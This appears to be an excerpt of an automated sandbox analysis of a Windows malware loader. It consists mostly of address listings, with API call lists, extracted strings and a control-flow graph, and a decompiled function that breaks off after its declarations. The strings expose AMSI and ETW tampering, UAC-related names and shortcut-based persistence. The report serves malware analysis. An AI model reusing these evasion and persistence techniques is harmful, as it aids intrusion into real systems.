                                                                                                0x0218aa9a
                                                                                                0x0218aa9a
                                                                                                0x0218aa9f
                                                                                                0x0218aaa5
                                                                                                0x0218aab5
                                                                                                0x0218aacd
                                                                                                0x0218aad8
                                                                                                0x0218aadf
                                                                                                0x0218aaea
                                                                                                0x0218ab02
                                                                                                0x0218ab0d
                                                                                                0x0218ab0e
                                                                                                0x0218ab13
                                                                                                0x0218ab18
                                                                                                0x0218ab1e
                                                                                                0x0218ab2e
                                                                                                0x0218ab46
                                                                                                0x0218ab51
                                                                                                0x0218ab58
                                                                                                0x0218ab63
                                                                                                0x0218ab7b
                                                                                                0x0218ab86
                                                                                                0x0218ab87
                                                                                                0x0218ab8c
                                                                                                0x0218ab91
                                                                                                0x0218ab97
                                                                                                0x0218aba7
                                                                                                0x0218abbf
                                                                                                0x0218abca
                                                                                                0x0218abd1
                                                                                                0x0218abdc
                                                                                                0x0218abf4
                                                                                                0x0218abff
                                                                                                0x0218ac00
                                                                                                0x0218ac05
                                                                                                0x0218ac0a
                                                                                                0x0218ac10
                                                                                                0x0218ac20
                                                                                                0x0218ac38
                                                                                                0x0218ac43
                                                                                                0x0218ac4a
                                                                                                0x0218ac55
                                                                                                0x0218ac6d
                                                                                                0x0218ac78
                                                                                                0x0218ac79
                                                                                                0x0218ac7e
                                                                                                0x0218ac84
                                                                                                0x0218ac89
                                                                                                0x0218ac9a
                                                                                                0x0218acb1
                                                                                                0x0218acb6
                                                                                                0x0218acbb
                                                                                                0x0218acc1
                                                                                                0x0218acd1
                                                                                                0x0218ace9
                                                                                                0x0218acf4
                                                                                                0x0218acfb
                                                                                                0x0218ad06
                                                                                                0x0218ad1e
                                                                                                0x0218ad29
                                                                                                0x0218ad2a
                                                                                                0x0218ad2f
                                                                                                0x0218ad34
                                                                                                0x0218ad3a
                                                                                                0x0218ad4a
                                                                                                0x0218ad62
                                                                                                0x0218ad6d
                                                                                                0x0218ad74
                                                                                                0x0218ad7f
                                                                                                0x0218ad97
                                                                                                0x0218ada2
                                                                                                0x0218ada3
                                                                                                0x0218ada8
                                                                                                0x0218adad
                                                                                                0x0218adb3
                                                                                                0x0218adc3
                                                                                                0x0218addb
                                                                                                0x0218ade6
                                                                                                0x0218aded
                                                                                                0x0218adf8
                                                                                                0x0218ae10
                                                                                                0x0218ae1b
                                                                                                0x0218ae1c
                                                                                                0x0218ae21
                                                                                                0x0218ae26
                                                                                                0x0218ae2c
                                                                                                0x0218ae3c
                                                                                                0x0218ae54
                                                                                                0x0218ae5f
                                                                                                0x0218ae66
                                                                                                0x0218ae71
                                                                                                0x0218ae89
                                                                                                0x0218ae94
                                                                                                0x0218ae95
                                                                                                0x0218ae9a
                                                                                                0x0218aea8
                                                                                                0x0218aeae
                                                                                                0x0218aeb3
                                                                                                0x0218aeb9
                                                                                                0x0218aec9
                                                                                                0x0218aee1
                                                                                                0x0218aeec
                                                                                                0x0218aef3
                                                                                                0x0218aefe
                                                                                                0x0218af16
                                                                                                0x0218af21
                                                                                                0x0218af22
                                                                                                0x0218af27
                                                                                                0x0218af2c
                                                                                                0x0218af32
                                                                                                0x0218af42
                                                                                                0x0218af5a
                                                                                                0x0218af65
                                                                                                0x0218af6c
                                                                                                0x0218af77
                                                                                                0x0218af8f
                                                                                                0x0218af9a
                                                                                                0x0218af9b
                                                                                                0x0218afa0
                                                                                                0x0218afa5
                                                                                                0x0218afab
                                                                                                0x0218afbb
                                                                                                0x0218afd3
                                                                                                0x0218afde
                                                                                                0x0218afe5
                                                                                                0x0218aff0
                                                                                                0x0218b008
                                                                                                0x0218b013
                                                                                                0x0218b014
                                                                                                0x0218b019
                                                                                                0x0218b02b
                                                                                                0x0218b036
                                                                                                0x0218b03b
                                                                                                0x0218b03b
                                                                                                0x0218b040
                                                                                                0x0218b045
                                                                                                0x0218b04b
                                                                                                0x0218b05b
                                                                                                0x0218b073
                                                                                                0x0218b07e
                                                                                                0x0218b085
                                                                                                0x0218b090
                                                                                                0x0218b0a8
                                                                                                0x0218b0b3
                                                                                                0x0218b0b4
                                                                                                0x0218b0b9
                                                                                                0x0218b0be
                                                                                                0x0218b0c4
                                                                                                0x0218b0d4
                                                                                                0x0218b0ec
                                                                                                0x0218b0f7
                                                                                                0x0218b0fe
                                                                                                0x0218b109
                                                                                                0x0218b121
                                                                                                0x0218b12c
                                                                                                0x0218b12d
                                                                                                0x0218b132
                                                                                                0x0218b137
                                                                                                0x0218b13d
                                                                                                0x0218b14d
                                                                                                0x0218b165
                                                                                                0x0218b170
                                                                                                0x0218b177
                                                                                                0x0218b182
                                                                                                0x0218b19a
                                                                                                0x0218b1a5
                                                                                                0x0218b1a6
                                                                                                0x0218b1ab
                                                                                                0x0218b1b0
                                                                                                0x0218b1b6
                                                                                                0x0218b1c6
                                                                                                0x0218b1de
                                                                                                0x0218b1e9
                                                                                                0x0218b1f0
                                                                                                0x0218b1fb
                                                                                                0x0218b213
                                                                                                0x0218b21e
                                                                                                0x0218b21f
                                                                                                0x0218b224
                                                                                                0x0218b22a
                                                                                                0x0218b22f
                                                                                                0x0218b235
                                                                                                0x0218b245
                                                                                                0x0218b25c
                                                                                                0x0218b261
                                                                                                0x0218b266
                                                                                                0x0218b26c
                                                                                                0x0218b27c
                                                                                                0x0218b294
                                                                                                0x0218b29f
                                                                                                0x0218b2a6
                                                                                                0x0218b2b1
                                                                                                0x0218b2c9
                                                                                                0x0218b2d4
                                                                                                0x0218b2d5
                                                                                                0x0218b2da
                                                                                                0x0218b2df
                                                                                                0x0218b2e5
                                                                                                0x0218b2f5
                                                                                                0x0218b30d
                                                                                                0x0218b318
                                                                                                0x0218b31f
                                                                                                0x0218b32a
                                                                                                0x0218b342
                                                                                                0x0218b34d
                                                                                                0x0218b34e
                                                                                                0x0218b355
                                                                                                0x0218b35a
                                                                                                0x0218b368
                                                                                                0x0218b379
                                                                                                0x0218b389
                                                                                                0x0218b394
                                                                                                0x0218b3a0
                                                                                                0x0218b3ab
                                                                                                0x0218b3ac
                                                                                                0x0218b3b1
                                                                                                0x0218b3b6
                                                                                                0x0218b3bc
                                                                                                0x0218b3cc
                                                                                                0x0218b3e4
                                                                                                0x0218b3ef
                                                                                                0x0218b3f6
                                                                                                0x0218b401
                                                                                                0x0218b419
                                                                                                0x0218b424
                                                                                                0x0218b425
                                                                                                0x0218b42a
                                                                                                0x0218b42f
                                                                                                0x0218b435
                                                                                                0x0218b445
                                                                                                0x0218b45d
                                                                                                0x0218b468
                                                                                                0x0218b46f
                                                                                                0x0218b47a
                                                                                                0x0218b492
                                                                                                0x0218b49d
                                                                                                0x0218b49e
                                                                                                0x0218b4b4
                                                                                                0x0218b4b9
                                                                                                0x0218b4c9
                                                                                                0x0218b4ce
                                                                                                0x0218b4d3
                                                                                                0x0218b4d9
                                                                                                0x0218b4e9
                                                                                                0x0218b501
                                                                                                0x0218b50c
                                                                                                0x0218b513
                                                                                                0x0218b51e
                                                                                                0x0218b536
                                                                                                0x0218b541
                                                                                                0x0218b542
                                                                                                0x0218b547
                                                                                                0x0218b54c
                                                                                                0x0218b552
                                                                                                0x0218b562
                                                                                                0x0218b57a
                                                                                                0x0218b585
                                                                                                0x0218b58c
                                                                                                0x0218b597
                                                                                                0x0218b5af
                                                                                                0x0218b5ba
                                                                                                0x0218b5bb
                                                                                                0x0218b5cc
                                                                                                0x0218b5d3
                                                                                                0x0218b5d4
                                                                                                0x0218b5d9
                                                                                                0x0218b5dc
                                                                                                0x0218b5df
                                                                                                0x0218b5e4
                                                                                                0x0218b5ea
                                                                                                0x0218b5fa
                                                                                                0x0218b612
                                                                                                0x0218b61d
                                                                                                0x0218b624
                                                                                                0x0218b62f
                                                                                                0x0218b647
                                                                                                0x0218b652
                                                                                                0x0218b653
                                                                                                0x0218b658
                                                                                                0x0218b65d
                                                                                                0x0218b663
                                                                                                0x0218b673
                                                                                                0x0218b68b
                                                                                                0x0218b696
                                                                                                0x0218b69d
                                                                                                0x0218b6a8
                                                                                                0x0218b6c0
                                                                                                0x0218b6cb
                                                                                                0x0218b6cc
                                                                                                0x0218b6d6
                                                                                                0x0218b6dd
                                                                                                0x0218b6fb
                                                                                                0x0218b706
                                                                                                0x0218b70d
                                                                                                0x0218b715
                                                                                                0x0218b723
                                                                                                0x0218b739
                                                                                                0x0218b744
                                                                                                0x0218b74b
                                                                                                0x0218b753
                                                                                                0x0218b75f
                                                                                                0x0218b775
                                                                                                0x0218b780
                                                                                                0x0218b787
                                                                                                0x0218b79b
                                                                                                0x0218b7a0
                                                                                                0x0218b7bb
                                                                                                0x0218b7d3
                                                                                                0x0218b7de
                                                                                                0x0218b7e5
                                                                                                0x0218b7ea
                                                                                                0x0218b7ed
                                                                                                0x0218b7f0
                                                                                                0x0218b7f5
                                                                                                0x0218b7ff
                                                                                                0x0218b7ff
                                                                                                0x0218aa94
                                                                                                0x0218aa33
                                                                                                0x02189130
                                                                                                0x02189130
                                                                                                0x02189132
                                                                                                0x02189134
                                                                                                0x02189135
                                                                                                0x00000000
                                                                                                0x02189137
                                                                                                0x02189137
                                                                                                0x02189140
                                                                                                0x02189141
                                                                                                0x02189146
                                                                                                0x02189149
                                                                                                0x0218914c
                                                                                                0x02189156
                                                                                                0x0218915b
                                                                                                0x0218915c
                                                                                                0x02189163
                                                                                                0x0218917b
                                                                                                0x02189180
                                                                                                0x02189181
                                                                                                0x02189186
                                                                                                0x02189188
                                                                                                0x021891a5
                                                                                                0x0218918a
                                                                                                0x02189194
                                                                                                0x02189194
                                                                                                0x02189165
                                                                                                0x0218916f
                                                                                                0x0218916f
                                                                                                0x021891aa
                                                                                                0x021891af
                                                                                                0x021891b5
                                                                                                0x021891c2
                                                                                                0x021891d4
                                                                                                0x021891dc
                                                                                                0x021891e0
                                                                                                0x021891eb
                                                                                                0x021891fd
                                                                                                0x02189205
                                                                                                0x02189206
                                                                                                0x0218920b
                                                                                                0x02189210
                                                                                                0x02189216
                                                                                                0x02189223
                                                                                                0x02189235
                                                                                                0x0218923d
                                                                                                0x02189241
                                                                                                0x0218924c
                                                                                                0x0218925e
                                                                                                0x02189266
                                                                                                0x02189267
                                                                                                0x0218926c
                                                                                                0x02189271
                                                                                                0x02189277
                                                                                                0x02189284
                                                                                                0x02189296
                                                                                                0x0218929e
                                                                                                0x021892a2
                                                                                                0x021892ad
                                                                                                0x021892bf
                                                                                                0x021892c7
                                                                                                0x021892c8
                                                                                                0x021892cd
                                                                                                0x021892d2
                                                                                                0x021892d8
                                                                                                0x021892e5
                                                                                                0x021892f7
                                                                                                0x021892ff
                                                                                                0x02189303
                                                                                                0x0218930e
                                                                                                0x02189320
                                                                                                0x02189328
                                                                                                0x02189329
                                                                                                0x0218932e
                                                                                                0x02189333
                                                                                                0x02189339
                                                                                                0x02189346
                                                                                                0x02189358
                                                                                                0x02189360
                                                                                                0x02189364
                                                                                                0x0218936f
                                                                                                0x02189381
                                                                                                0x02189389
                                                                                                0x0218938a
                                                                                                0x0218938f
                                                                                                0x02189394
                                                                                                0x0218939a
                                                                                                0x021893a7
                                                                                                0x021893b9
                                                                                                0x021893c1
                                                                                                0x021893c5
                                                                                                0x021893d0
                                                                                                0x021893e2
                                                                                                0x021893ea
                                                                                                0x021893eb
                                                                                                0x02189412
                                                                                                0x02189417
                                                                                                0x0218941c
                                                                                                0x02189422
                                                                                                0x0218942f
                                                                                                0x02189441
                                                                                                0x02189449
                                                                                                0x0218944d
                                                                                                0x02189458
                                                                                                0x0218946a
                                                                                                0x02189472
                                                                                                0x02189473
                                                                                                0x0218947b
                                                                                                0x02189486
                                                                                                0x02189495
                                                                                                0x02189513
                                                                                                0x02189518
                                                                                                0x0218951e
                                                                                                0x0218952e
                                                                                                0x02189546
                                                                                                0x02189551
                                                                                                0x02189558
                                                                                                0x02189563
                                                                                                0x0218957b
                                                                                                0x02189586
                                                                                                0x02189587
                                                                                                0x02189596
                                                                                                0x02189497
                                                                                                0x02189497
                                                                                                0x0218949c
                                                                                                0x021894a2
                                                                                                0x021894af
                                                                                                0x021894c1
                                                                                                0x021894c9
                                                                                                0x021894d0
                                                                                                0x021894db
                                                                                                0x021894f0
                                                                                                0x021894f8
                                                                                                0x021894f9
                                                                                                0x02189503
                                                                                                0x02189509
                                                                                                0x02189509
                                                                                                0x0218959b
                                                                                                0x021895a0
                                                                                                0x021895a6
                                                                                                0x021895b6
                                                                                                0x021895ce
                                                                                                0x021895d9
                                                                                                0x021895e0
                                                                                                0x021895eb
                                                                                                0x02189603
                                                                                                0x0218960e
                                                                                                0x0218960f
                                                                                                0x02189614
                                                                                                0x02189619
                                                                                                0x0218961f
                                                                                                0x0218962f
                                                                                                0x02189647
                                                                                                0x02189652
                                                                                                0x02189659
                                                                                                0x02189664
                                                                                                0x0218967c
                                                                                                0x02189687
                                                                                                0x02189688
                                                                                                0x02189695
                                                                                                0x021896a5
                                                                                                0x021896aa
                                                                                                0x021896af
                                                                                                0x021896b5
                                                                                                0x021896bd
                                                                                                0x021896c2
                                                                                                0x021896c2
                                                                                                0x021896bd
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,0218E742,?,?,?,00000000,00000000), ref: 0218915C
                                                                                                • InetIsOffline.URL(00000000,00000000,00000000,0218E742,?,?,?,00000000,00000000), ref: 02189181
                                                                                                  • Part of subcall function 02183690: LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                  • Part of subcall function 02183690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                  • Part of subcall function 02183690: GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                  • Part of subcall function 02183690: RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                  • Part of subcall function 02183690: GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                  • Part of subcall function 02183690: NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                  • Part of subcall function 02183690: FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                  • Part of subcall function 021780F8: GetFileAttributesA.KERNEL32(00000000,?,02189493,ScanString,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,Initialize,0218E77C,ScanString,0218E77C,OpenSession), ref: 02178103
                                                                                                  • Part of subcall function 021734CC: GetFileSize.KERNEL32(0001D7B0,00000000,02194B88,?,02189B35,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,021949C4,ScanBuffer,0218E77C), ref: 021734E8
                                                                                                  • Part of subcall function 02188CBC: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02188D00
                                                                                                  • Part of subcall function 02188CBC: InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,00000000,00000000), ref: 02188D3B
                                                                                                  • Part of subcall function 02188CBC: InternetReadFile.WININET(00CC000C,021945B8,00000401,021949BC), ref: 02188D71
                                                                                                  • Part of subcall function 02188CBC: InternetCloseHandle.WININET(00CC000C), ref: 02188DB4
                                                                                                  • Part of subcall function 0217811C: GetFileAttributesA.KERNEL32(00000000,?,0218A7E7,ScanString,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanString,0218E77C,OpenSession), ref: 02178127
                                                                                                  • Part of subcall function 021782B0: CreateDirectoryA.KERNEL32(00000000,00000000,?,0218A80D,ScanString,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanString,0218E77C), ref: 021782BD
                                                                                                  • Part of subcall function 021889A4: _lcreat.KERNEL32(00000000,00000000), ref: 021889DB
                                                                                                  • Part of subcall function 021889A4: _lwrite.KERNEL32(00000000,00000000,?,00000000,02188A21), ref: 021889FB
                                                                                                  • Part of subcall function 021889A4: _lclose.KERNEL32(00000000), ref: 02188A01
                                                                                                  • Part of subcall function 02172FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,021949C4), ref: 02172FE8
                                                                                                • CopyFileA.KERNEL32(00000000,00000000,000000FF), ref: 0218B379
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Internet$AttributesHandleInetLibraryMemoryModuleOfflineOpen$AddressCloseCopyCreateCurrentDirectoryFlushFreeLoadMoveNameProcProcessReadSizeVirtual_lclose_lcreat_lwrite
                                                                                                • String ID: .exe$.url$197$5E5CDDEE$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$CopyFileA$CreateRemoteThreadEx $EtwEventWrite$EtwEventWriteEx$HotKey=$IconIndex=$Initialize$InternetCloseHandle$InternetOpenUrl$InternetOpena$InternetReadFile$KernelBase$LdrGetDllHandle$LdrLoadDll$LdrQueryProcessModuleInformation$NtAccessCheck$NtAccessCheckAndAuditAlarm$NtAllocateUuids$NtCreateFile$NtCreateSection$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenSection$NtPrivilegeCheck$NtPrivilegeObjectAuditAlarm$NtPrivilegedServiceAuditAlarm$NtQuerySecurityObject$NtSetSecurityObject$Null$OpenSession$ReportEventA$ReportEventW$ScanBuffer$ScanString$SetEncryptedFileMetadata$URL=file:"$UacInitialize$UacScan$VirtualAlloc$VirtualProtect$[InternetShortcut]$^^Nc$advapi32$http$iexpress.exe$kernel32$kernelbase$ntdll$wininet
                                                                                                • API String ID: 1007107856-3759982345
                                                                                                • Opcode ID: bbcd3a54a06d968f7670c9fc248b9bf1c4e17a8fecfac4daa24acadeddd056fe
                                                                                                • Instruction ID: 1c973ebeb905e214977474096667421f7a8ab2d068a2a774be2c551649986acc
                                                                                                • Opcode Fuzzy Hash: bbcd3a54a06d968f7670c9fc248b9bf1c4e17a8fecfac4daa24acadeddd056fe
                                                                                                • Instruction Fuzzy Hash: F083F239AC02589FDB31FB64DD90BDE73F6AB89700F1084E6A549A7210DF309E868F55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0218C0D9 Relevance: 103.4, APIs: 16, Strings: 42, Instructions: 1937filesleepnativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2190 218c0d9-218cb64 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 21889a4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 218884c call 21748f4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 21889a4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 21889a4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 218884c call 21748f4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 21889a4 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174d64 call 2174a98 call 21780f8 2503 218cb6a-218cdea call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174d64 call 21737ac call 2188a30 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 Sleep call 2174d64 call 2174a98 call 2174d64 DeleteFileA call 2174d64 call 2174a98 call 2174d64 DeleteFileA call 2174d64 call 2174a98 call 2174d64 DeleteFileA call 2174d64 call 2174a98 call 2174d64 DeleteFileA call 2174d64 call 2174a98 call 2174d64 DeleteFileA call 2174d64 call 2174a98 call 2174d64 DeleteFileA 2190->2503 2504 218cdeb-218ceec call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174cb0 2190->2504 2503->2504 2566 218d6fa-218d7fb call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174cb0 2504->2566 2567 218cef2-218cf01 call 2174cb0 2504->2567 2659 218d8ef-218d9f0 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174cb0 2566->2659 2660 218d801-218d810 call 2174cb0 2566->2660 2567->2566 2576 218cf07-218cf16 call 2174cb0 2567->2576 2576->2566 2584 218cf1c-218d4dd call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174bb0 call 2174d64 WinExec Sleep call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174d64 call 2174a98 call 21857d0 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 OpenProcess call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 NtSuspendThread call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 217304c InetIsOffline 2576->2584 3014 218d4df-218d4ee call 21748f4 2584->3014 3015 218d4f0-218d563 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 2584->3015 2761 218dacd-218df6e call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174a98 * 2 call 2183690 call 2174a98 * 2 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174a98 * 2 call 2183690 call 2174a98 * 2 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 217304c 2659->2761 2762 218d9f6-218da05 call 2174cb0 2659->2762 2660->2659 2671 218d816-218d825 call 2174cb0 2660->2671 2671->2659 2685 218d82b-218d83d call 217304c InetIsOffline 2671->2685 2694 218d83f-218d84e call 21748f4 2685->2694 2695 218d850-218d8c3 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 2685->2695 2706 218d8c9-218d8ea call 2172fc4 call 2174dbc call 2183990 2694->2706 2695->2706 2744 218d8c4 call 2183690 2695->2744 2706->2659 2744->2706 3083 218df70-218df7f call 21748f4 2761->3083 3084 218df81-218df86 2761->3084 2762->2761 2771 218da0b-218da1a call 2174cb0 2762->2771 2771->2761 2780 218da20-218da32 call 217304c InetIsOffline 2771->2780 2789 218da34-218da43 call 21748f4 2780->2789 2790 218da45-218dab8 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 2780->2790 2802 218dabe-218dac8 call 2174dbc call 21848a0 2789->2802 2790->2802 2836 218dab9 call 2183690 2790->2836 2802->2761 2836->2802 3024 218d569-218d6f5 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174dbc call 218779c call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 ZwClose call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 3014->3024 3015->3024 3054 218d564 call 2183690 3015->3054 3024->2566 3054->3024 3088 218df90-218e617 call 2174a98 * 2 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174a98 * 2 call 2183690 call 2174a98 * 2 call 2183690 call 2174a98 * 2 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174c24 call 2174d64 call 2174a98 call 2174bb0 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 call 2174a98 call 2174d64 call 2174a98 call 2183690 ExitProcess 3083->3088 3084->3088 3089 218df8b call 21748f4 3084->3089 3089->3088
                                                                                                C-Code - Quality: 25%
                                                                                                			E0218C0D9(intOrPtr __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t674;
				intOrPtr _t741;
				intOrPtr _t818;
				intOrPtr _t885;
				intOrPtr _t915;
				void* _t920;
				intOrPtr _t949;
				intOrPtr _t979;
				intOrPtr _t1009;
				intOrPtr _t1214;
				intOrPtr _t1223;
				intOrPtr _t1232;
				intOrPtr _t1241;
				intOrPtr _t1250;
				intOrPtr _t1259;
				intOrPtr _t1268;
				intOrPtr _t1277;
				intOrPtr _t1286;
				intOrPtr _t1295;
				intOrPtr _t1304;
				intOrPtr _t1313;
				intOrPtr _t1336;
				intOrPtr _t1345;
				intOrPtr _t1354;
				intOrPtr _t1363;
				intOrPtr _t1372;
				intOrPtr _t1381;
				intOrPtr _t1390;
				intOrPtr _t1435;
				intOrPtr _t1437;
				void* _t1440;
				intOrPtr _t1460;
				intOrPtr _t1462;
				void* _t1465;
				void* _t1484;
				void* _t1485;
				intOrPtr _t1489;
				intOrPtr _t1491;
				intOrPtr _t1554;
				long _t1588;
				void* _t1618;
				void* _t1663;
				void* _t1694;
				void* _t1710;
				intOrPtr _t1741;
				intOrPtr _t1761;
				intOrPtr _t1769;
				intOrPtr _t1777;
				intOrPtr _t1785;
				intOrPtr _t1793;
				intOrPtr _t1801;
				int _t1807;
				intOrPtr _t1816;
